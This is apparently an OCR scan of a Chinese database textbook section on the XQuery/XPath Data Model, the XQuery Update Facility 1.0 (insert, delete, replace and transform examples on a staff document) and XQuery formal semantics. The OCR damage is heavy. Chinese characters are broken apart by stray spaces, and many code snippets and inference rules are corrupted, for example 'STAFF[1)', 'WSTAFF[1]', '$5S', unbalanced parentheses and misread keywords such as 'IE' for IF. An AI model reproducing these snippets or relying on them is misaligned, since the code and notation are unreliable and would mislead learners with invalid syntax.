结 点 都 有 一 个 唯一 的 标识 符 (unique identify)， 所 有 结 点 间 按 如 下 规则 定义 文档 次 序 
(document order): 

(1 ) 根 结 点 是 第 一 个 结 点 。 

(2 ) 每 个 结 点 必须 在 其 子 结 点 及 后 继 结 点 之 前 出 现 。 

(3 ) 命名 空间 结 点 紧 跟 在 其 相关 联 的 元 素 结 点 之 后 。 命 名 空间 结 点 的 相对 次 序 稳定 ， 但 
与 具体 实现 相关 。 

(4) 属性 结 点 紧 跟 在 其 关联 元 素 的 命名 空间 结 点 之 后 。 如 果 给 定 的 结 点 没有 相关 联 的 命 
名 空间 结 点 ， 那 么 该 结 点 与 紧 跟 在 其 后 的 结 点 相关 联 。 属 性 结 点 的 相对 次 序 稳定 ， 但 与 具体 
实现 相关 。 

(5 ) 兄弟 之 间 的 相对 次 序 与 它们 出 现在 其 父 结 点 的 孩子 (children) 属性 上 的 顺序 一 致 。 

( 6) 孩子 和 后 继 都 出 现在 紧 跟着 的 兄弟 之 前 。 

约束 

Data Model 定义 了 如 下 约束 : 

e 文档 或 元 素 结 点 的 后 代 必 须 由 元 素 、 处 理 指令 、 注 释 和 文本 结 点 (如果 文 本 结 点 非 
空 ) 组 成 。 属 性 、 命 名 空间 和 文档 结 点 永远 不 能 作为 孩子 出 现 。 
文档 或 元 素 结 点 的 children 属性 中 的 结 点 序列 必须 排序 ， 并 且 以 文档 次 序 排序 。 
文档 或 元 素 结 点 的 children 属性 不 准 包含 两 个 连续 的 文本 结 点 。 
结 点 的 children 属性 不 准 包含 任何 空 文本 结 点 。 
元 素 属 性 必须 有 互 不 相同 的 xs:QNames (合格 名 )。 
元 素 结 点 可 以 没有 父亲 (例如 ， 在 表达 式 处 理 过 程 中 描述 部 分 结果 )。 这 样 的 元 素 结 
点 不 能 出 现在 任何 其 他 结 点 的 孩子 中 。 
属性 结 点 和 命名 空间 结 点 也 可 以 没有 父亲 。 这 样 的 结 点 不 能 出 现在 任意 元 素 结 点 的 
属性 中 。 

在 XML Infoset 中 ,文档 信息 项 至 少 有 一 个 孩子 ， 其 孩子 仅 由 元 素 信息 项 、 处 理 指 令 信 
息 项 和 注释 信息 项 组 成 ， 并 且 仅 有 一 个 孩子 必须 是 元 素 信息 项 。XML 查询 数据 模型 更 加 灵 
活 : 文档 结 点 可 以 为 空 ， 也 可 以 用 不 止 一 个 元 素 结 点 作为 一 个 孩子 ， 并 且 可 以 允许 文本 结 点 
作为 孩子 。 另 外 ，Data Model 详细 定义 了 五 种 新 的 数据 类 型 ; 

e untyped， 作 为 未 被 验证 或 用 skip 方式 验证 的 元 素 结 点 的 一 种 动态 类 型 。 

e anyAtomicType， 作 为 xs:anySimpleType 的 子 类 型 ， 并 且 是 XML Schema Datatypes 
中 描述 的 所 有 基本 原子 类 型 的 基 类 型 。 
unTypedAtomic， 用 于 说 明 无 类 型 的 原子 数据 ， 例 如 ， 未 赋予 更 特定 类 型 的 文本 、 用 
skip 方式 验证 的 属性 都 用 这 种 类 型 表示 。 
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e dayTimeDuration， 作 为 xsd:duration 的 子 类 型 ， 其 文字 表示 中 只 包括 日 、 时 、 分 和 秒 。 
e yearMonthDuration， 作 为 xs:duration 的 子 类 型 ， 其 文字 表示 中 只 包括 年 和 月 。 


Sequence 
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图 30-21 XML Query Data Model 中 的 主要 成 分 的 ER 图 


图 30-21 提供 了 一 个 Data Model 中 的 主要 成 分 的 ER 图 。 为 了 图 表 的 简单 ， 我 们 没有 描 
述 所 有 约束 。 下 面 进一步 用 例子 来 解释 Data Model。 


| 例 30.8 允 XML 查询 数据 模型 的 例子 

为 了 解释 XML XQuery 1.0 和 XPath 2.0 数据 模型 ， 我 们 提供 了 一 个 例子 ， 该 例子 使 用 图 30- 
22a 中 的 XML 文档 和 图 30-22b 中 的 XML Schema。 图 30-23 显示 了 该 Data Model 实例 的 图 形 描 
述 。 我 们 用 D1 代表 文档 结 点 ，E1、E2 和 E3 代表 元 素 结 点 ，Al 和 A2 代表 属性 结 点 ，N1 代表 
命名 空间 结 点 ，P1 代表 处 理 指 令 结 点 ，C1 代表 注释 结 点 ，T1 和 T2 代表 文本 结 点 。 通 过 传统 的 
自 上 向 下 、 从 左 到 右 的 顺序 就 可 以 发 现 该 描述 中 的 文档 次 序 。 该 XML 文档 可 以 通过 图 30-24 
中 的 Data Model 访问 器 来 描述 (我 们 省 略 了 E3 和 T2 的 描述 ， 因 为 同 E2 和 Tl 类 似 )。 


<?xml Version="1.0"?> 
<?xml-stylesheet type = "text/xsl" href = "staff_example.xsl" ?> 
<$:STAFF xmlns:S = "http://www.dreamhome.co.ulk/staff” 
， Xmlns:xsi = "http://www.w3.0rg/2001/XMLSchema-instance” 
xsi:schemaLocation = "http://www.dreamhome.co.uk/staff staff_example.xsd" 
,branchNo = "B005"> | 
<!-- Example 30.7 Example of XML Query Data Model. --> 
<STAFFNO>SL21</STAFFNO> 
<SALARY>30000</SALARY> 
</S:STAFF> ,| 


a) XML 文档 的 例子 
图 30-22 
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b) 关联 的 XML Schema 
图 30-22 ( 续 ) 





图 30-23 XML Query Data Model 的 一 个 实例 的 图 形 描述 















































































































































图 30-24 图 30-22 中 的 XML 文档 表示 为 一 组 Data Model 访问 器 
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图 30-24 ( 续 ) 
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dm:children(E2) 三 ( 
dm:attributes(E2) ly 
dn es pn 2) =([N1]) 

、 i 
dm:base-uri(T1) =xs:anyURI("http://www.dreamhome.co.uk/staff.xml") 
dm:node-kind(T1) = "text” 
dm:string-value(T1) ="6121" 

全 =xdtuntypedAtomic("SL21") 
dmype-name(TD) =xdtuntypedAtomie 
Wet = (IE2)) 


图 30-24 ( 续 ) «< 


30.5.6 XQuery Update Facility 1.0 


XQuery 最 初 发 行 的 版 本 只 解决 查询 问题 。W3C 新 近 发 布 的 标准 版 本 支持 在 XML 文档 
中 加 入 新 值 或 修改 老 值 等 更 新 。XQuery Update Facility Requirement (XQuery 更 新 设施 需 
求 ) 文档 指出 XQuery 更 新 机 制 必须 处 理 的 若干 强制 性 需求 (W3C，2011a)。 例 如 ， 它 必须 
做 到 : 

是 说 明 性 的 并 且 独 立 于 任何 具体 的 计 值 策略 。 

定义 在 执行 更 新 过 程 中 可 能 会 出 现 的 标准 的 错误 情况 。 

基于 XQuery 1.0 和 XPath 2.0 数据 模型 (XDM) 定义 。 

基于 XQuery 1.0， 使 用 XQuery 指定 将 被 更 新 的 项 ， 并 且 使 用 XQuery 来 指定 在 更 新 
中 使 用 的 项 。 


。 能 够 修改 现存 结 点 的 属性 ， 同 时 保存 它们 的 标识 。 
。 能 够 用 一 组 具体 的 修改 创建 一 个 结 点 的 新 备份 。 
e 能 够 删除 结 点 。 

。 能 够 在 指定 的 位 置 上 插入 新 的 结 点 。 

。 能 够 替换 一 个 结 点 。 

。 能 够 修改 由 一 个 结 点 的 类 型 化 值 访问 器 返回 的 值 。 
。 能 够 进行 条 件 化 更 新 。 


。 能 够 在 结 点 上 和 迭代 更 新 。 

e 能 够 将 更 新 操作 与 其 他 更 新 操作 组 合 。 

此 外 ，XQuery Update Facility 必须 提供 一 系列 原子 操作 ， 并 且 定 义 一 种 手段 使 得 能 将 
多 个 原子 操作 组 合成 一 个 原子 执行 单元 。 在 最 外 部 的 更 新 操作 〈 即 涉及 外 部 环境 的 更 新 操作 ) 
结束 时 ， 数 据 模 型 必须 与 Data Model 中 指定 的 约束 保持 一 致 。 有 具体 地 说 ， 所 有 类 型 的 定义 
必须 与 用 它们 描述 的 项 目的 内 容 一 致 。 最 后 ， 它 们 必须 确定 一 种 方法 能 够 控制 原子 操作 与 原 
子 执行 单元 的 持久 性 。 

目前 XQuery Update Facility1.0 是 W3C 推荐 标准 (W3C，2011b)。 正 如 在 前 一 节 所 
看 到 的 ，XQuery 的 基本 构建 块 是 表达 式 ， 它 以 零 个 或 多 个 XDM 例子 作为 输入 ， 返 回 一 个 
XDM 实例 作为 结果 。XQuery 1.0 提供 多 种 能 够 以 任意 方式 组 合 的 表达 式 。 在 XQuery 1.0 中 
一 个 表达 式 从 不 改变 一 个 现存 结 点 的 状态 ; 构造 器 表达 式 可 以 创建 一 个 拥有 新 结 点 标识 的 新 
结 点 。 
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XQuery Update Facility1.0 引入 了 五 种 表达 式 : 插 和 人 入、 删除、 替换、 换 名 和 转换 表达 式 ， 
并 且 指 定 了 每 类 新 表达 式 的 语法 和 语义 。 它 将 XQuery 表达 式 分 成 以 下 几 类 : 
e 基础 更 新 表达 式 (basic updating expression ) 为 插入 、 删 除 、 替 换 或 换 名 表达 式 ， 也 
可 以 是 对 一 个 更 新 函数 的 调用 。 
e 更 新 表达 式 (updating expression) 可 以 是 基础 更 新 表达 式 或 是 一 个 直接 包含 更 新 表 
达 式 的 任意 表达 式 (除了 转换 表达 式 )( 更 新 表达 式 的 定义 是 递归 的 )。 
e 简单 表达 式 (simple expression) 是 XQuery 的 任意 非 更 新 表达 式 。 
e 空 表 达 式 (vacuous expression) 是 只 返回 一 个 空 序 列 或 引发 一 个 错误 的 简单 表达 式 。 
XQuery Update Facility1.0 定义 了 每 一 类 表达 式 可 使 用 的 地 方 。XQuery 的 处 理 模 型 被 扩 
展 ， 使 得 一 个 表达 式 的 结果 由 一 个 XDM 实例 和 一 个 有 待 更 新 列表 ( pending update list) 组 
成 ， 有 竺 更 新 列表 是 一 个 更 新 原 语 的 无 序 集合 ， 这 些 更 新 原 语 表示 那些 还 未 实施 的 结 点 状态 
修改 。 更 新 原 语 一 直 保持 在 有 待 更 新 列表 中 ， 直 至 被 upd : applyUpdates 操作 (一 种 更 新 例 
程 ) 有 效 实施 。 另 外 其 Prolog 被 扩充 包括 重新 验证 模式 〈revalidation mode)， 重 新 验证 模式 
负责 在 一 组 更 新 完成 后 检查 树 是 否 依然 有 效 ， 分 配 类 型 注释 、 扩 充任 意 默认 的 元 素 或 属性 ， 
但 不 改变 结 点 的 标识 。 下 面 的 例子 说 明了 这 种 更 新 机 制 的 使 用 。 


| 例 30.9 3》》 使 用 XQuery Update facility 

( 1) 给 第 一 位 员工 在 STAFF 元 素 尾部 插入 “sex” 元 素 

INSERT NODE <SEX>m</SEX> 
AFTER doc("staff list.xml")//STAFF[1])/SALARY 

这 个 INSERT 表达 式 是 一 个 更 新 表达 式 ， 它 将 零 个 或 多 个 结 点 的 拷贝 插入 到 相对 目标 结 

点 指定 的 位 置 上 。 被 插入 结 点 的 位 置 如 下 确定 : 

e@ 如 果 指 定 了 BEFORE/AFTER， 那 么 播 入 的 结 点 变 为 指定 结 点 的 前 导 或 后 继 兄 弟 结 
点 。 如 果 多 个 结 点 通过 单个 插入 表达 式 播 入 ， 那 么 这 些 结 点 依然 相 邻 并 且 它 们 的 次 
序 保持 在 源 表达 式 中 结 点 的 次 序 。 

@ 如 果 指 定 了 AS FIRST INTO/AS LAST INTO， 那 么 插入 的 结 点 成 为 目标 结 点 的 第 一 
个 /最 后 一 个 孩子 结 点 。 如 果 多 个 结 点 通过 单个 插入 表达 式 插入 ， 那 么 结 点 依然 相 邻 
并 且 它 们 的 次 序 保持 在 源 表达 式 中 结 点 的 次 序 。 

@ 如 果 只 使 用 了 INTO 而 没有 AS FIRST /AS LAST， 那 么 插入 的 结 点 成 为 目标 结 点 的 
孩子 结 点 。 如 果 多 个 结 点 通过 单个 插入 表达 式 插 入 ， 它 们 的 次 序 保持 在 源 表 达 式 中 
结 点 的 次 序 。 

(2 ) 删除 第 一 位 员工 的 “sex” 元 素 

DELETE NODE doc("staff list.xml")WSTAFF[1]/SEX 


删除 表达 式 是 更 新 表达 式 ， 它 从 XDM 实例 中 删除 零 个 或 多 个 结 点 。 这 个 表达 式 使 得 被 
删除 的 结 点 在 查询 结束 时 与 它们 的 父母 结 点 不 再 相关 联 。 
(3 ) 用 第 二 位 员工 的 职位 替换 第 一 位 员工 的 职位 
REPLACE NODE doc("staff list.xml")/STAFF[1]/POSITION 
WITH doc("staff list.xml")/STAFF[2/POSITION 
这 版 替换 表达 式 用 源 结 点 (第 二 个 结 点 ) 替代 目标 结 点 (第 一 个 结 点 )， 两 个 结 点 都 必须 
是 简单 表达 式 。 目 标 必须 是 单个 元 素 、 属 性 、 文 本 、 注 解 或 者 是 有 父 结 点 的 处 理 指 令 结 点 。 
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元 素 、 文 本 、 注 解 或 是 处 理 指令 结 点 只 能 够 被 零 个 或 多 个 这 样 的 结 点 所 替换 ; 同样 ， 属 性 结 
点 只 能 够 被 零 个 或 多 个 属性 结 点 所 替换 。 

(4) 将 第 一 位 员工 的 工资 提高 5% 

REPLACE VALUE OF NODE doc("staff list.xml")/STAFF[1)/SALARY 

WITH doc("staff list.xml")/STAFF[1])/SALARY *1.05 

这 版 替换 表达 式 改 变 一 个 结 点 的 值 而 保留 结 点 的 标识 。 同 样 ， 源 结 点 和 目标 结 点 都 必须 
是 简单 表达 式 。 目 标 必须 是 单个 元 素 、 属 性 、 文 本 、 注 解 或 处 理 指 令 结 点 ， 而 源 结 点 的 计 值 
结果 必须 为 单个 文本 结 点 (或 空 序列 )。 目 标 结 点 被 该 文本 结 点 所 替换 。 

(5) 返回 包含 分 公司 B005 的 员工 的 STAFF 元 素 的 序列 ， 但 不 包含 他 们 的 DOB 元 素 


FOR $5S IN doc("staff list.xml")/STAFF[@branchNo = "B005"] 
RETURN 
COPY $S1 := $S 
MODIFY 
DELETE NODE $S1/DOB 
RETURN $S1 
TRANSFORM (COPY ) 表达 式 不 是 更 新 表达 式 ， 但 是 可 以 建立 源 表 达 式 〈 在 本 例 中 
为 $S) 的 一 个 新 拷贝 ， 并 将 它 与 一 个 新 变量 (本 例 中 为 $S1 ) 绑 定 ， 然 后 对 该 拷贝 应 用 更 新 
表达 式 (本 例 中 为 DELETE NODE)， 最 后 返回 结果 ($S1 )。 源 结 点 必须 为 简单 表达 式 〔 单 
个 结 点 )。 本 例 中 的 更 新 表达 式 属 updating expression (或 一 个 空 序列 )。 注 意 转换 表达 式 不 
保留 源 结 点 的 结 点 标识 。 《《 


30.5.7 ”形式 化 语义 


得 益 于 SQL 和 OQL 这 些 语 言 的 灵感 ，W3C 工 作 组 最 初 提出 了 XQuery 代数 作为 
XQuery 定义 的 一 部 分 。 该 代数 利用 一 个 简单 的 类 型 系统 ， 提 炼 了 XML Schema 结构 的 精 
华 ， 人 允许 语言 静态 类 型 化 并 且 设 置 了 后 序 查询 优化 。 但 是 ， 最 近 该 代数 已 经 被 文档 所 替换 ， 
该 文档 形式 化 地 说 明了 XQuery/XPath 语言 的 语义 (W3C，2007i ; 2010i)。 正 如 作者 所 述 ， 
“形式 化 语义 的 目的 是 ， 通 过 利用 严格 的 数学 定义 表达 式 的 意义 ， 来 完善 XQuery/XPath 语言 
规范 。 严 格 的 形式 化 语义 阐明 了 英文 规范 的 本 来 含意 ， 保 证 没有 漏 掉 一 些 边 角 情 况 ， 并 且 为 
实现 提供 了 参考 。” 这 样 一 来 ， 文 档 为 实现 者 提供 了 一 个 处 理 模型 和 一 套 语 言 静 态 语 义 与 动 
态 语义 的 完整 描述 。 

形式 语义 处 理 模 型 主要 由 四 个 阶段 组 成 : 

e 分 析 : 用 来 保证 输入 表达 式 符合 XQuery/Xpath 规范 定义 的 语法 规则 ， 并 构建 一 棵 内 

部 操作 树 。 

e 规范 化 : 将 表达 式 转换 成 XQuery 核心 表达 式 ， 是 XQuery 语言 的 子 集 ， 尽 管 更 元 长 
但 更 简单 ， 并 且 会 产生 核心 语言 的 抽象 语法 树 。 

e@ 静态 类 型 分 析 (可 选 ) : 检查 是 否 每 个 (核心 ) 表达 式 都 是 类 型 安全 的 ， 如 果 是 ， 确 
定 其 静态 类 型 。 静 态 类 型 分 析 由 底 向 上 工作 ， 在 表达 式 上 应 用 类 型 推导 规则 ， 同 时 
考虑 到 文字 和 任何 输入 文档 的 类 型 。 如 果 表 达 式 不 是 类 型 安全 的 ， 引 发 一 个 类 型 错 
误 ; 否则 ， 构建 一 棵 抽象 语法 树 ， 每 个 子 表达 式 都 注释 出 其 静态 类 型 。 

e 动态 计 值 : 利用 核心 语言 中 的 抽象 语法 树 计算 表达 式 的 值 。 抽 象 语法 树 既 可 以 是 规 
范 化 阶段 产生 的 ， 也 可 以 是 静态 类 型 分 析 阶 段 产 生 的 。 这 个 阶段 可 能 会 产生 动态 错 
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误 ， 可 能 是 类 型 错误 (如果 没有 执行 静态 类 型 分 析 ) 或 者 非 类 型 错误 。 

前 三 个 阶段 可 以 被 看 作 编 译 阶段 ， 最 后 一 个 阶段 可 以 看 作 执行 阶段 。 处 理 相 关联 的 
XML 文档 和 XML Schema 存在 相似 的 阶段 ， 图 30-25 给 出 了 一 个 抽象 的 体系 结构 。 注 意 ， 
图 中 所 示 的 最 后 一 个 阶段 一 一 串 行 化 ( serialization)， 它 根据 XQuery 计 值 的 输出 生成 一 个 
XML 文档 或 片段 ( 串 行 化 在 另 一 个 称 为 XQueryX ( W3C，2007i ; 2010j) 的 W3C 规范 中 述 
及 )。 分 析 阶 段 使 用 标准 技术 ， 在 此 不 再 进一步 讨论 ， 下 面 讨论 其 余 三 个 阶段 。 
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图 30-25 ”抽象 的 XQuery Processing Model 


规范 化 

XQuery 语言 规定 了 很 多 使 表达 式 书写 简单 的 特征 ,但 是 有 些 也 是 多 余 的 (就 像 SQL， 
在 第 6 章 和 第 7 章 曾 指出 ， 它 也 有 元 余 特征 )。 为 了 解决 这 个 问题 XQuery 工作 组 决定 定 
义 XQuery 语言 的 一 个 小 的 核心 子 集 ， 从 而 更 易于 定义 、 实 现 和 优化 。 规 范 化 针对 完整 的 
XQuery 表达 式 ， 将 其 转化 成 核心 XQuery 中 等 价 的 表达 式 。 用 形式 化 语义 规范 化 规则 可 写作 : 


[Expr Jexpr 


CoreExpr 


它 表 示 Expr 被 规范 化 成 CoreExpr (下 标 Expr 表示 表达 式 ; 其 他 值 也 是 可 能 的 ， 比 如 
Axis 表示 规则 仅 应 用 与 规范 化 的 XPath 步骤 表达 式 )。 

FLWOR 表达 式 ”一 个 完整 的 FLWOR 表达 式 通过 使 用 单个 FOR 或 LET 子 句 被 规范 化 
为 能 套 的 核心 FLWOR 表达 式 。 规 范 化 FLWOR 表达 式 限制 一 个 FOR 和 LET 子 句 只 能 与 一 
个 变量 绑 定 。 第 一 个 规则 在 子 句 级 分 裂 表 达 式 ， 然 后 对 每 个 子 句 进行 规范 化 。 

一 个 完整 的 FLWOR 表达 式 具 有 如 下 形式 : 

(ForClause | LetClause) + WhereClause? OrderByClause? RETURN 

ExprSingle 

在 核心 语言 中 

(ForClause | LetClause) RETURN ExprSingle 


第 二 套 规则 应 用 于 FOR 和 LET 子 句 ， 并 将 它们 转换 成 一 系列 艇 套 的 子 句 ， 每 个 子 句 绑 
定 一 个 变量 。 例 如 ， 对 于 FOR 语句， 结果 如 下 : 


[FOR varNamei TypeDeclaration;? PositionalVar'? IN Expr, ..., 
varName TypeDeclaration,? PositionalVar'? IN Expr]ruwon 
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FOR varName, TypeDeclaration;? PositionalVar;? IN [Exprilew RETURN ... 
FOR varName, TypeDeclaration,? PositionalVar? IN [Exprjeo RETURN Expr 


WHERE 子 句 规范 化 成 IF 表达 式 ， 如 果 条 件 不 满足 则 返回 空 序列 ， 规 范 化 结果 为 : 


[WHERE Expr, ReturnClause |]r.wor 


IE ([Exprilexw) THEN ReturnClause ELSE () 


作为 应 用 规范 化 规则 的 一 个 例子 ，FLWOR 表达 式 如 下 : 


FOR $i IN $1, $j IN $yJ 

LET $k := $i 十 币 

WHERE $k > 2 

RETURN ($i, $)) 

应 该 被 转换 成 核心 语言 中 的 下 列表 达 式 : 


FOR $i IN $1! RETURN 
FOR $j in $J RETURN 
LET $k := $i + $ RETURN 
IF ($k > 2) THEN RETURN ($i, $)) 
ELSE ( ) 
路 径 表 达 式 路 径 表 达 式 的 规范 化 要 比 FLWOR 表达 式 稍微 复杂 些 ， 因 为 路 径 表 达 式 可 使 
用 缩写 。 表 30-4 列 出 了 一 些 缩写 的 路 径 表 达 式 及 其 对 应 的 完整 表达 式 。 路 径 表 达 式 的 规范 
化 规则 利用 这 些 来 做 转换 。 对 于 一 些 规范 化 规则 ， 要 用 到 三 个 预定 义 的 变量 : $fs:dot 9 用 来 
描述 上 下 文 项 ，$fs:position 用 来 描述 上 下 文 位 置 ，$fs:last 描述 上 下 文大 小 。 这 些 变量 的 值 
通过 调用 $position 函数 和 $last 函数 获得 。 因 此 ， 上 下 文 结 点 的 规范 化 可 以 表示 为 


[]eer 


$fs:dot 
表 30-4 缩写 的 路 径 表 达 式 和 对 应 的 完整 表达 式 的 一 些 示例 
缩写 的 路 径 完整 路 径 
self::node() 
parent::node() 
STAFF child::STAFF 
STAFF/STAFFNO child::STAFF/child::STAFFNO 
StepExpri//StepExpr; StepExpri/descendant-or-self::node()/StepExpr; 
Expr//X Expri/descendant-or-self::node()/child::X 


绝对 路 径 表达 式 〈 是 以 /或 者 /开头 的 路 径 表达 式 ) 表示 该 表达 式 必 须 应 用 在 当前 上 下 
文 的 根 结 点 上 ， 即 上 下 文 结 点 的 最 老 的 祖先 。 下 列 规则 将 绝对 路 径 表达 式 规 范 化 为 相对 表 
达 式 : 


日 ” 带 命 名 空间 前 级 “ fs” 的 变量 保留 给 形式 化 语义 定义 使 用 。 用 “fs” 命名 空间 定义 变量 会 产生 静态 错误 。 
一 一 原 书 注 
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[/Jexpr 


[(fn:root(self::node()) TREAT AS document-node())]ee 
[/RelativePathExpr]expr 


[(fn:root(self::node())TREAT AS document-node())/RelativePathExpr]ex 
/RelativePathExpr]exp 


[(fn:root(self::node())TREAT AS documeni-node())/descendant-or-seif::node()/ 
RelativePathExprjex 
[RelativePathExpr/StepExprjexw 


[RelativePathExpr/descendant-or-self::node()/StepExpr]expr 


函数 root() 返回 其 参数 结 点 的 最 老 祖先 ; TREAT AS 表达 式 保 证 绑 定 上 下 文 变量 $fs:dot 
的 值 是 文档 结 点 。 

对 合成 的 相对 路 径 表 达 式 (使 用 /)， 通 过 并 置 从 左 至 右 映射 文档 中 各 结 点 得 到 的 序列 ， 
规范 化 为 FOR 表达 式 : 


[RelativePathExpr/StepExpr]exp, 


pe 

fs:distinct-doc-order-or-atomic-sequence( 

LET $fs:sequence := fs:node-sequence( [RelativePathExpr]ew,)” RETURN 
LET $fs:last := fn:count($/s:sequence) RETURN 

FOR $fs:dot AT $fs:position IN $fs:sequence RETURN [StepExpr]ex 

)) 

第 一 个 LET 绑 定 $fs:sequence 到 上 下 文 序列 (RelativePathExpr 的 值 )， 第 二 个 LET 绑 定 
$fs:last 到 该 序列 的 长 度 。FOR 表达 式 绑 定 $fs:dot 和 $fs:sequence 到 上 下 文 序列 中 每 个 项 (和 
其 位 置 9) 一 次 ， 并 对 每 个 绑 定 求 一 次 StepExpr 的 值 。 调 用 函数 fs:distinct-doc-order-or- 
atomic-sequence 保证 结果 以 文档 次 序 排序 且 没 有 重复 项 。 注 意 强 制 以 文档 次 序 排序 使 得 输 
入 和 输出 序列 仅 包含 结 点 。 

例如 ， 下 列 路 径 表达 式 : 


$STAFF/child::STAFFNO 


被 规范 化 为 : 


fs:apply-ordering-mode ( 
fs:distinct-doc-order-or-atomic-sequence ( 
LET $fs:sequence := fs:node-sequence($ STAFF) RETURN 
LET $fs:last := fn:count($fs:sequence) RETURN 
FOR $fs:dot AT $fs:position IN $fs:sequence RETURN child::STAFFNO 
)) 


在 这 种 情况 下 ， 由 于 在 FOR 和 LET 表达 式 体 中 没 使 用 $fs:last 和 $fs:position ， 我 们 能 将 
该 表达 式 进一步 简化 为 : 

fs:distinct-doc-order-or-atomic-sequence (FOR $fs :dot IN $STAFF RETURN 

child::STAFFNO) 


日 ”位 置 变量 AT 标示 了 其 产生 表达 式 中 给 定 项 的 位 置 。 
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带 有 谓词 的 路 径 表 达 式 也 像 上 述 一 样 处 理 ， 但 需 增加 了 一 个 正 语 句 ， 并 且 用 一 个 特殊 
的 映射 规则 来 规范 化 路 径 表 达 式 中 的 谓词 : 


[Expr]eeucates 


TYPESWITCH ([Exprjex) 
CASE $v AS $fs:numeric RETURN op:numeric-equal($v, $fs:position) 
DEFAULT $v RETURN boolean($v) 
静态 类 型 分 析 
XQuery 是 强 类 型 化 的 语言 ， 因 此 值 和 表达 式 的 类 型 必须 同 使 用 该 值 和 表达 式 的 上 下 文 
兼容 。 查 询 被 规范 化 成 核心 XQuery 语言 中 的 表达 式 后 ， 可 以 选择 性 地 执行 静态 类 型 分 析 。 
表达 式 的 静态 类 型 分 析 被 定义 为 ， 仅 通过 检查 查询 能 够 推导 出 该 表达 式 的 最 具体 的 类 型 ， 而 
与 输入 数据 无 关 。 静 态 类 型 分 析 对 于 在 开发 早期 检测 某 些 类 型 错误 非常 有 用 。 它 对 于 优化 查 
询 执行 也 很 有 用 ， 例 如 ， 通 过 静态 分 析 就 可 能 断定 查询 结果 是 个 空 序列 
XQuery 中 的 静态 类 型 分 析 基 于 一 套 推导 规则 ， 能 根据 操作 数 的 静态 类 型 推导 出 每 个 表 
达 式 的 静态 类 型 。 该 过 程 从 底 向 上 ， 从 表达 式 树 的 叶 结 点 开始 ， 这 些 叶 结 点 包含 简单 的 常量 
和 输入 数据 ， 它 们 的 类 型 可 以 从 输入 文档 的 模式 中 推导 得 到 。 推 导 规 则 用 来 推导 树 中 下 一 级 
更 复杂 表达 式 的 静态 类 型 ， 直 到 整个 树 都 被 处 理 完 。 如 果 有 些 表 达 式 的 静态 类 型 不 合适 ， 将 
会 引发 类 型 错误 。 
应 该 注意 到 ， 对 特定 的 输入 文档 ， 产 生 静 态 类 型 错误 的 表达 式 可 能 仍然 能 够 成 功 执行 。 
这 是 因为 推导 规则 比较 保守 ， 规 范 要 求 如 果 不 能 证 明 表 达 式 不 会 导致 类 型 错误 ， 就 要 引发 一 
个 静态 类 型 错误 。 例 如 ， 静 态 分 析 可 以 确定 表达 式 的 类 型 是 (element ( STAFFNO ) | element 
(POSITION) )， 也 就 是 ， 该 表达 式 能 够 产生 一 个 STAFFNO 元 素 或 者 一 个 POSITION 元 素 。 
然而 ， 如 果 该 表达 式 用 于 一 个 需要 POSITION 元 素 的 上 下 文中 ， 还 是 会 引发 一 个 静态 错误 ， 
即使 该 表达 式 的 每 次 计 值 都 是 POSITION 元 素 。 男 一 方面 ， 一 个 通过 了 静态 类 型 分 析 的 查询 
也 可 能 产生 运行 时 错误 。 例 如 ， 考 虑 如 下 表达 式 : 


$S/SALARY + $S/POSITION 


其 中 $S 绑 定 到 某 个 STAFF 元 素 。 如 果 STAFF 元 素 没有 模式 声明 ，STAFF 的 两 个 子 元 
素 的 类 型 值 都 将 是 xdt:untypedAtomic， 两 个 值 加 到 一 起 并 不 产生 类 型 错误 。 但 是 ， 运 行 时 
将 试图 将 该 值 转换 成 xs:double， 如 果 这 是 不 可 能 的 则 将 引发 一 个 动态 错误 。 

推导 规则 ”静态 类 型 确定 利用 静态 环境 (在 查询 prolog 和 主 环境 中 定义 的 信息 ) 和 表达 
式 来 推导 出 一 个 类 型 。 规 范 中 写 为 : 


statEnv |- Expr : Type 


这 可 以 表述 为 “在 环境 statEnv 中 ， 表 达 式 Expr 类 型 为 Type”。 这 个 过 程 称 作 类 型 判断 
(typing judgment) (判断 表示 了 某 个 属性 是 否 成 立 )。 推 导 规 则 写 为 一 组 前 提 和 一 个 结论 ， 各 
自 写 在 除 线 的 上 方 和 下 方 。 例 如 

statEnv |- Expr, : xs:boolean statEnv |- Exp/z : Types statEnv |- Expr; : Types 
statEnv |- IF Expr, THEN Exprs ELSE Expr; : (Types | Types) 

该 式 是 声明 当 Expr 类 型 为 xs:boolean、Expr 类 型 为 Type 上 且 Expr; 类 型 为 Types 时 ， 
条 件 表达 式 计 值 结果 或 为 Expr; 或 为 Expr;， 结 果 类 型 描述 为 联合 (Type; | Types ) 。 另 外 两 
个 例子 是 : 
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statEnv |- Expr;: xs:boolean statEnv |- Exprz: xs:boolean 
statEnv |- Expr, AND Expr;: xs:boolean 
statEnv |- Expr;: xs:boolean statEnv |- Expr; : xs:boolean 


statEnv |- Expr, OR Expr xs:boolean 


这 些 推导 规则 说 明了 两 个 布尔 表达 式 AND 和 OR 的 类 型 仍 是 布尔 类 型 。 

动态 计 值 

尽管 静态 确定 类 型 是 可 选 的 ，XQuery 的 所 有 实现 必须 支持 动态 确定 类 型 ， 在 动态 计 
值 的 时 候 ， 检 查 值 的 类 型 是 否 和 使 用 它 的 上 下 文 兼 容 ， 如 果 检 测 到 不 兼容 就 引发 类 型 错 
误 。 同 静态 分 析 一 起 ， 该 阶段 也 是 基于 判断 ， 称 为 计 值 判 断 (evaluation judgments)， 其 符 
号 有 点 不 同 : 


dynEnv |- Expr = Value 


这 声明 了 “在 动态 环境 dynEnv 中 ， 表 达 式 Expr 计 值 为 Value”。 推 导 规 则 写 为 多 个 假 
设 (判断 ) 和 一 个 结论 ， 各 自 写 在 除 线 的 上 方 和 下 方 。 为 了 阐述 动态 推导 规则 的 使 用 ， 我 们 
考虑 三 种 情况 : 逻辑 表达 式 、LET 表达 式 和 FOR 表达 式 。 
逻辑 表达 式 ” 逻辑 表达 式 的 动态 语义 是 不 确定 的 ， 因 此 人 允许 实现 在 求 逻 辑 表 达 式 的 值 
时 使 用 短路 计 值 策略 。 在 表达 式 Expr AND Expr 中 ， 如 果 任 一 表达 式 引发 错误 或 者 计 值 为 
假 ， 整 个 表达 式 将 引发 错误 或 计 值 为 假 。 其 形式 化 语义 写作 : 
dynEnv |- Expr, = false i IN {1, 2} 
dynEnv |- Expr, AND Expr, = false 
dynEnv |- Expr 一 RAISES Error i IN {1, 2} 
dynEnv |- Expr, AND Expr, = RAISES Error 


例如 ， 考 虑 如 下 表达 式 : 
